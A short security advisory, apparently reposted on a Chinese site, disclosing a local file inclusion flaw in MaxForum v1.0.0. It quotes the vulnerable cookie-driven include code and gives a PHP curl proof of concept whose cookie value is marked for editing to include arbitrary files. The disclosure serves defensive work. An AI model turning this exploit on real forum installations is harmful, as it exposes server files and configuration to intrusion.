+---------------------------------------+ | MaxForum v1.0.0 Local File Inclusion | +---------------------------------------+ 作者 ahwak2000 z.u5[at]hotmail[dot]com 下载地址 http://www.max4dev.com/ 已测试版本 1.0 /MaxForum/includes/forums/warn_popup.php 该文件: line 100 if (isset($_COOKIE['max_lang']) && (!isset($_COOKIE['max_name']))){ line 101 $board_lang = escape_string($_COOKIE['max_lang']); line 102 } line 103 line 104 @include "language/$board_lang"; line 105 @include "language/$board_lang.php"; /MaxForum/libs/php/functions.php 文件中 function escape_string($string) { $string = addslashes($string); $string = htmlspecialchars($string); return $string; } www.2cto.com 测试证明 <? $url="http:// www.2cto.com /MaxForum/"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url."/includes/forums/warn_popup.php"); curl_setopt($ch, CURLOPT_COOKIE, "max_lang=gpl.txt"); // <--- edit $buffer = curl_exec($ch); ?> #end
查看更多关于MaxForum v1.0.0本地文件包含缺陷及修复 - 网站安全的详细内容...